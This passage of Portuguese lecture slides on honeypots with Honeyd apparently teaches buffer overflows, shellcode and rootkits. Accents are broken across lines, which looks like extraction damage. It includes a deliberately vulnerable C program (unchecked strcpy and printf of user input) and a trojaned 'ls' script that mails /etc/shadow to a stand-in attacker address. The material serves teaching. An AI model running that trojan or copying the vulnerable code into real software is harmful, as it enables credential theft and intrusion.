e de seguida fazer restart ao daemon “sshd” atrav´s de
e
“/etc/init.d/sshd restart”.
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

64. Vulnerabilidades
Comportamento n˜o previsto num artefacto de software
a
Buffer Overflow
Input n˜o validado
a
SQL Injection
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

65. Explora¸˜o de vulnerabilidades
ca
Exploit
´
E a designa¸˜o dada a um peda¸o de c´digo que serve para
ca c o
explorar falhas em aplica¸˜es de forma a causarem um
co
comportamento pr´viamente n˜o antecipado nas mesmas.
e a
# include < stdio .h >
# include < string .h >
int main ( int argc , char * argv []) {
char buffer [10];
strcpy ( buffer , argv [1]) ;
printf ( buffer ) ;
return 0;
}
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

66. Buffer Overflow
user@honeypot :~ $ gcc exploit . c -o exploit
user@honeypot :~ $ ./ exploit thisisanexploit
*** stack smashing detected ***: ./ exploit terminated
thisisanexploitAborted
Um dos mecanismos de defesa do gcc
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

67. ShellCode
Um conjunto de instru¸˜es (em c´digo m´quina ou n˜o)
co o a a
desenvolvidas de maneira a que possam ser injectadas numa
aplica¸˜o em tempo de execu¸˜o.
ca ca
Acesso ilegal a espa¸o de mem´ria n˜o autorizado
c o a
Injec¸˜o do shellcode
ca
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

68. RootKits
Conjunto de programas malicionsos (trojans, backdoors
chkrootkit e rkhunter (Linux)1 ;
RootkitRevealer (Windows).
1
Ambos dispon´
ıveis no gestor de pacotes do Ubuntu.
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

69. Trojaned ls
#!/ bin / bash
mv / bin / ls / bin / ls . old
/ bin / echo quot; cat / etc / shadow | mail intruso@intruso . pt quot; > / bin / ls
/ bin / echo quot;/ bin / ls . old quot; >> / bin / ls
chmod + x / bin / ls
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

70. Conclus˜o
a
Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd